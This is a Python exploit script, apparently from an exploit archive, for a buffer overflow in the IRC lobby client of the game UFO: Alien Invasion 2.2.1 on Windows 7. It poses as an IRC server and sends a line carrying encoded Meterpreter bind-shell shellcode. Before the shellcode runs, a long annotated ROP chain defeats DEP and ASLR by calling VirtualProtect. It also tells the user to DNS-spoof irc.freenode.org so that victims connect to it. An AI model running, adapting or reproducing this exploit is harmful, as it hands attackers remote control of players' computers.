
# Title : UFO: Alien Invasion v2.2.1 BoF Exploit (Win7 ASLR and DEP Bypass)
# Published : 2010-07-05
# Author : Node


#!/usr/bin/python
#
# Exploit Title:	UFO: Alien Invasion v2.2.1 BoF Exploit (Win7 ASLR and DEP Bypass)
# Date:			July 5, 2010
# Author:		Node
# Software Link:	http://sourceforge.net/projects/ufoai/files/UFO_AI%202.x/2.2.1/ufoai-2.2.1-win32.exe/download
# Version:		"UFO: Alien Invasion 2.2.1 x86 Apr 28 2008 Win32 RELEASE"
# Tested on:		Windows 7 Ultimate x64 ENG
# CVE :
# Max shellcode size: 	328 bytes
# Badchars: 		'\x00\x0a\x0d'  (NUL plus the CR/LF that terminate the IRC line)
# Instructions: 	1. Run this script on a host the victim can reach on TCP port 6667 and
#			   DNS-spoof/redirect "irc.freenode.org" to that host's IP.
#			2. Have the victim click "Multiplayer" and then "Lobby"; the game's IRC
#			   client connects to the listener and is sent the payload.
#
# Notes:		The gadget addresses come from libraries shipped with the game (e.g. the
#			writable slot at 0x6176e005 is in SDL_mixer.dll), so they are tied to the
#			2.2.1 win32 build rather than to the Windows version. The only
#			Windows-specific value is the low word of VirtualProtect() in kernel32.dll
#			(0x34ec, carried in the 0xffff34ec dword): the "grabbing kernel32" section
#			picks a kernel32 pointer off the stack at run time and patches its low 16
#			bits, relying on ASLR relocating the image base in 64 KiB steps and so
#			never touching those bits. To try another Windows version, replace 0x34ec
#			with the low word of VirtualProtect()'s address in that kernel32.dll.


import socket
import struct
import sys

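#msfpayload windows/meterpreter/bind_tcp LPORT=4444 R | msfencode -b '\x00\x0a\x0d' -t c
#[*] x86/shikata_ga_nai succeeded with size 326 (iteration=1)
#
# 326 bytes, fits the 0x148 (328) byte dwSize the ROP chain passes to
# VirtualProtect().  The shikata_ga_nai decoder rewrites the payload in place,
# so the region has to be writable as well as executable -- hence the chain's
# flNewProtect of 0x40 (PAGE_EXECUTE_READWRITE).  Kept as a bytes literal so
# the same file works under Python 2 and 3; the escapes must stay '\xHH'.
shellcode = (
    b"\xbf\xb7\x89\xfe\x0e\xda\xd3\xd9\x74\x24\xf4\x2b\xc9\xb1\x4b"
    b"\x5e\x83\xc6\x04\x31\x7e\x11\x03\x7e\x11\xe2\x42\x75\x16\x87"
    b"\xac\x86\xe7\xf8\x25\x63\xd6\x2a\x51\xe7\x4b\xfb\x12\xa5\x67"
    b"\x70\x76\x5e\xf3\xf4\x5e\x51\xb4\xb3\xb8\x5c\x45\x72\x04\x32"
    b"\x85\x14\xf8\x49\xda\xf6\xc1\x81\x2f\xf6\x06\xff\xc0\xaa\xdf"
    b"\x8b\x73\x5b\x54\xc9\x4f\x5a\xba\x45\xef\x24\xbf\x9a\x84\x9e"
    b"\xbe\xca\x35\x94\x88\xf2\x3e\xf2\x28\x02\x92\xe0\x14\x4d\x9f"
    b"\xd3\xef\x4c\x49\x2a\x10\x7f\xb5\xe1\x2f\x4f\x38\xfb\x68\x68"
    b"\xa3\x8e\x82\x8a\x5e\x89\x51\xf0\x84\x1c\x47\x52\x4e\x86\xa3"
    b"\x62\x83\x51\x20\x68\x68\x15\x6e\x6d\x6f\xfa\x05\x89\xe4\xfd"
    b"\xc9\x1b\xbe\xd9\xcd\x40\x64\x43\x54\x2d\xcb\x7c\x86\x89\xb4"
    b"\xd8\xcd\x38\xa0\x5b\x8c\x54\x05\x56\x2e\xa5\x01\xe1\x5d\x97"
    b"\x8e\x59\xc9\x9b\x47\x44\x0e\xdb\x7d\x30\x80\x22\x7e\x41\x89"
    b"\xe0\x2a\x11\xa1\xc1\x52\xfa\x31\xed\x86\xad\x61\x41\x79\x0e"
    b"\xd1\x21\x29\xe6\x3b\xae\x16\x16\x44\x64\x3f\xe6\x61\xd4\x28"
    b"\x0b\x95\xca\xf4\x82\x73\x86\x14\xc3\x2c\x3f\xd7\x30\xe5\xd8"
    b"\x28\x13\x5a\x70\xbf\x2b\xb5\x46\xc0\xab\x90\xe4\x6d\x03\x72"
    b"\x7f\x7e\x90\x63\x80\xab\xb0\xf4\x17\x21\x51\xb7\x86\x36\x78"
    b"\x2d\x49\xa3\x87\xe7\x1e\x5b\x8a\xde\x69\xc4\x75\x35\xe2\xcd"
    b"\xe3\xf5\x9d\x31\xe4\xf5\x5d\x64\x6e\xf5\x35\xd0\xca\xa6\x20"
    b"\x1f\xc7\xdb\xf8\x8a\xe8\x8d\xad\x1d\x81\x33\x8b\x6a\x0e\xcc"
    b"\xfe\x6a\x72\x1b\xc7\xe8\x82\x2e\x2b\x31\x60"
)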



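#start
def gadget(addr):
    """Pack one 32-bit gadget address or immediate little-endian, as it sits on the x86 stack."""
    return struct.pack("<L", addr)


FILLER = b"A" * 4                  # eaten by a stray POP (or skipped by ADD ESP); value unused
VIRTUALPROTECT_LOW_WORD = 0x34EC   # low 16 bits of kernel32!VirtualProtect on the tested build

# Stage-1 chain.  The first gadgets reserve a VirtualProtect() call frame
# (function address, return address, lpAddress, dwSize, flNewProtect,
# lpflOldProtect) behind an ADD ESP,1C that hops over it; the rest of the
# chain fills the placeholders in one MOV [EDX],reg at a time, walking EDX
# down the frame with INC EDX.  Addresses are given as integers so the byte
# order and a badchar check are handled by gadget() rather than by hand.
rop = b"".join([
    gadget(0x6170C95A),        # PUSH ESP # POP EBX # POP EBP     -> EBX = &FILLER below
    FILLER,
    gadget(0x686C14D6),        # ADD ESP,1C                        -> skip the 7-dword frame
    b"1111",                   # VirtualProtect() address placeholder
    b"2222",                   # return address placeholder (-> shellcode)
    b"3333",                   # lpAddress placeholder
    b"4444",                   # dwSize placeholder
    b"5555",                   # flNewProtect placeholder
    gadget(0x6176E005),        # lpflOldProtect: writable dword in SDL_mixer.dll
    FILLER,
    gadget(0x68105745),        # MOV EAX,EBX # POP EBX # POP EBP
    FILLER * 2,
    gadget(0x68105BDD),        # MOV EDX,EAX # MOV EAX,EDX
    gadget(0x67583472) * 8,    # INC EDX # DEC EAX  (x8)           -> EDX = &"1111" slot

    # grabbing kernel32: build EAX = 0x9b0, then load the dword that far below
    # the frame -- a kernel32 pointer the caller left on the stack -- into EAX.
    gadget(0x675851B8),        # MOV EAX,200
    gadget(0x686C3371),        # MOV ECX,EAX # MOV EAX,ECX
    gadget(0x6171F9E3) * 2,    # ADD ECX,ECX  (x2)                 -> ECX = 0x800
    gadget(0x68102353),        # XOR EAX,EAX
    gadget(0x67584950) * 5,    # ADD EAX,20  (x5)                  -> EAX = 0xa0
    gadget(0x68138C6B),        # XCHG EAX,EBP
    gadget(0x61725425),        # ADD ECX,EBP                       -> ECX = 0x8a0
    gadget(0x68138C6B),        # XCHG EAX,EBP
    gadget(0x67584950) * 3,    # ADD EAX,20  (x3)                  -> EAX = 0x100
    gadget(0x68138C6B),        # XCHG EAX,EBP
    gadget(0x61725425),        # ADD ECX,EBP                       -> ECX = 0x9a0
    gadget(0x686C3373),        # MOV EAX,ECX
    gadget(0x68138C6B),        # XCHG EAX,EBP
    gadget(0x67585128),        # MOV EAX,2
    gadget(0x686C3371),        # MOV ECX,EAX # MOV EAX,ECX
    gadget(0x6171F9E3) * 3,    # ADD ECX,ECX  (x3)                 -> ECX = 0x10
    gadget(0x68138C6B),        # XCHG EAX,EBP
    gadget(0x67589F6F),        # ADD ECX,EAX # MOVZX EAX,CX        -> EAX = 0x9b0
    gadget(0x67598D9C),        # POP ECX
    gadget(0x6176E005),        # writable scratch for the next gadget's stray WORD store
    gadget(0x61719BEE),        # MOV EBX,EDX # SUB EBX,EAX # MOV EAX,EBX # MOV WORD PTR DS:[ECX+44],AX # ADD ESP,4 # POP EBX # POP EBP
    FILLER * 3,
    gadget(0x68110167),        # MOV EAX,DWORD PTR DS:[EAX]        -> EAX = kernel32 pointer

    # VirtualProtect(): keep the upper half of that pointer, patch its low word
    # to 0x34ec, and store the result in the "1111" slot.  The MOV ESP,EBP in
    # the last-but-one gadget re-syncs the stack (EBP was set to &FILLER+0x60
    # above) so execution lands on the final MOV [EDX],ECX.
    gadget(0x686C3371),        # MOV ECX,EAX # MOV EAX,ECX
    gadget(0x6170C95A),        # PUSH ESP # POP EBX # POP EBP
    FILLER,
    gadget(0x68102353),        # XOR EAX,EAX
    gadget(0x67584950) * 3,    # ADD EAX,20  (x3)                  -> EAX = 0x60
    gadget(0x68138C6B),        # XCHG EAX,EBP
    gadget(0x68131F6A),        # ADD EBP,EBX
    gadget(0x686C3373),        # MOV EAX,ECX
    gadget(0x68138C6B),        # XCHG EAX,EBP
    gadget(0x686C3371),        # MOV ECX,EAX # MOV EAX,ECX
    gadget(0x68138C6B),        # XCHG EAX,EBP
    gadget(0x686C13E2),        # POP EBX
    gadget(0xFFFF0000 | VIRTUALPROTECT_LOW_WORD),  # 0xffff34ec: only the low word matters
    gadget(0x70803542),        # XOR AL,AL # POP EBP
    FILLER,
    gadget(0x686D4D02),        # ADD AL,BL                         -> AL = 0xec
    gadget(0x68138C6B),        # XCHG EAX,EBP
    gadget(0x686C3373),        # MOV EAX,ECX
    gadget(0x68138C6B),        # XCHG EAX,EBP
    gadget(0x686C3371),        # MOV ECX,EAX # MOV EAX,ECX
    gadget(0x6170A534),        # MOV CH,BH # ADD AL,BYTE PTR DS:[EAX] # MOV ESP,EBP # POP EBP   -> CH = 0x34
    FILLER * 4,
    gadget(0x67584BB9),        # MOV DWORD PTR DS:[EDX],ECX        -> "1111" = VirtualProtect

    # fetch shellcode: return address slot ("2222") = ESP here + 0x158, which is
    # where the shellcode starts in the line sent below.
    gadget(0x6170C95A),        # PUSH ESP # POP EBX # POP EBP
    FILLER,
    gadget(0x67583472) * 4,    # INC EDX # DEC EAX  (x4)           -> EDX = &"2222" slot
    gadget(0x68105745),        # MOV EAX,EBX # POP EBX # POP EBP
    FILLER * 2,
    gadget(0x68138C6B),        # XCHG EAX,EBP
    gadget(0x68102353),        # XOR EAX,EAX
    gadget(0x686C13E2),        # POP EBX
    gadget(0xFFFFFFAC),        # 0xac * 2 = 0x158
    gadget(0x686D4D02),        # ADD AL,BL
    gadget(0x686C3371),        # MOV ECX,EAX # MOV EAX,ECX
    gadget(0x6171F9E3),        # ADD ECX,ECX                       -> ECX = 0x158
    gadget(0x686C3373),        # MOV EAX,ECX
    gadget(0x68138C6B),        # XCHG EAX,EBP
    gadget(0x67589F6F),        # ADD ECX,EAX # MOVZX EAX,CX        -> ECX = &shellcode
    gadget(0x67584BB9),        # MOV DWORD PTR DS:[EDX],ECX        -> "2222" = &shellcode

    # again: lpAddress ("3333") = &shellcode as well
    gadget(0x67583472) * 4,    # INC EDX # DEC EAX  (x4)           -> EDX = &"3333" slot
    gadget(0x686C3373),        # MOV EAX,ECX
    gadget(0x67585126),        # MOV DWORD PTR DS:[EDX],EAX # MOV EAX,2

    # set dwsize 0x148 (328) into "4444"
    gadget(0x67583472) * 4,    # INC EDX # DEC EAX  (x4)           -> EDX = &"4444" slot
    gadget(0x68102353),        # XOR EAX,EAX
    gadget(0x686C13E2),        # POP EBX
    gadget(0xFFFFFFA4),        # 0xa4 * 2 = 0x148 (328)
    gadget(0x686D4D02),        # ADD AL,BL
    gadget(0x686C3371),        # MOV ECX,EAX # MOV EAX,ECX
    gadget(0x6171F9E3),        # ADD ECX,ECX                       -> ECX = 0x148
    gadget(0x686C3373),        # MOV EAX,ECX
    gadget(0x67585126),        # MOV DWORD PTR DS:[EDX],EAX # MOV EAX,2

    # forwardjump: EBP = ESP + 0x70, LEAVE -> continue at rop2's "set
    # flNewProtect" section, past the NOP pad and the backjump stub.
    gadget(0x68102353),        # XOR EAX,EAX
    gadget(0x686C13E2),        # POP EBX
    gadget(0xFFFFFF70),        # 0x70
    gadget(0x686D4D02),        # ADD AL,BL
    gadget(0x6170C95A),        # PUSH ESP # POP EBX # POP EBP
    FILLER,
    gadget(0x68138C6B),        # XCHG EAX,EBP
    gadget(0x68131F6A),        # ADD EBP,EBX
    gadget(0x686DCDC6),        # LEAVE
    FILLER,
])

# Stage-2 chain, placed 552 bytes after the start of rop.  Its first dword is
# what the overwritten return address hits: the backjump stub pivots ESP to
# (ESP - 0x22c), which is exactly the start of rop, and stage 1 later jumps
# forward into the "set flNewProtect" section below.
rop2 = b"".join([
    #backjump
    gadget(0x6170C95A),        # PUSH ESP # POP EBX # POP EBP
    FILLER,
    gadget(0x68105745),        # MOV EAX,EBX # POP EBX # POP EBP
    FILLER * 2,
    gadget(0x68105BDD),        # MOV EDX,EAX # MOV EAX,EDX
    gadget(0x675851B8),        # MOV EAX,200
    gadget(0x67584950),        # ADD EAX,20
    gadget(0x686C13E2),        # POP EBX
    gadget(0xFFFFFF0C),        # 12                                -> EAX = 0x22c
    gadget(0x686D4D02),        # ADD AL,BL
    gadget(0x67598D9C),        # POP ECX
    gadget(0x6176E005),        # writable scratch for the next gadget's stray WORD store
    gadget(0x61719BEE),        # MOV EBX,EDX # SUB EBX,EAX # MOV EAX,EBX # MOV WORD PTR DS:[ECX+44],AX # ADD ESP,4 # POP EBX # POP EBP
    FILLER * 3,
    gadget(0x6813367A),        # XCHG EAX,ESP                      -> pivot to start of rop

    # set flNewProtect 0x40 (PAGE_EXECUTE_READWRITE) into "5555"  (land here)
    gadget(0x67583472) * 4,    # INC EDX # DEC EAX  (x4)           -> EDX = &"5555" slot
    gadget(0x68102353),        # XOR EAX,EAX
    gadget(0x67584950) * 2,    # ADD EAX,20  (x2)                  -> EAX = 0x40
    gadget(0x67585126),        # MOV DWORD PTR DS:[EDX],EAX # MOV EAX,2

    # ending: EDX -= 0x10 (back to the "1111" slot), pivot ESP onto the completed
    # frame so the next RET calls VirtualProtect(), which returns into shellcode.
    gadget(0x686C3371),        # MOV ECX,EAX # MOV EAX,ECX
    gadget(0x6171F9E3) * 3,    # ADD ECX,ECX  (x3)                 -> ECX = 0x10
    gadget(0x686C3373),        # MOV EAX,ECX
    gadget(0x68133D52),        # SUB EDX,EAX # MOV EAX,EDX
    gadget(0x6813367A),        # XCHG EAX,ESP
])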

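ROP_SLOT = 552                 # bytes from the start of rop to the first dword of rop2
BADCHARS = b"\x00\x0a\x0d"     # NUL plus the CR/LF that end the IRC line

end = b"\x0d\x0a"              # CRLF terminates the line -- the reason \x0a/\x0d are badchars

# The NOP pad is what keeps rop2 at its fixed offset; a chain that outgrew the
# slot would silently get an empty pad and shift everything, so refuse instead.
if len(rop) > ROP_SLOT:
    sys.exit("[-] rop chain is %d bytes, larger than the %d-byte slot" % (len(rop), ROP_SLOT))

# Line layout: "001" (IRC RPL_WELCOME numeric) + stage-1 chain + NOP pad up to
# the slot + stage-2 chain + shellcode.  Total: 5 + 552 + 132 + 326 (+ CRLF).
body = b"001 :" + rop + b"\x90" * (ROP_SLOT - len(rop)) + rop2 + shellcode

# Fail loudly rather than send a payload the client would cut short or mangle.
body_bytes = bytearray(body)   # bytearray so iteration yields ints on Python 2 and 3 alike
for bad in bytearray(BADCHARS):
    if bad in body_bytes:
        sys.exit("[-] badchar 0x%02x present in payload, aborting" % bad)

sploit = body + end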
 
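# Fake IRC server: wait for the game's lobby client on TCP 6667 (all
# interfaces), hand it the payload once, and exit.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)  # allow immediate re-runs
try:
    s.bind(('', 6667))
    s.listen(1)
    print("[*] Listening on port 6667.")
    print("[*] Have someone connect to you.")
    print("[*] Type <control>-c to exit.")
    conn, addr = s.accept()
    print("[*] Received connection from: %s" % (addr,))
    # str/bytes shim so the same script runs under Python 2 and 3
    payload = sploit if isinstance(sploit, bytes) else sploit.encode("latin-1")
    try:
        conn.sendall(payload)  # send() may stop after a partial write
    finally:
        conn.close()           # the original wrote `conn.close` without () -- a no-op
except KeyboardInterrupt:
    print("\n[*] Interrupted, exiting.")
finally:
    s.close()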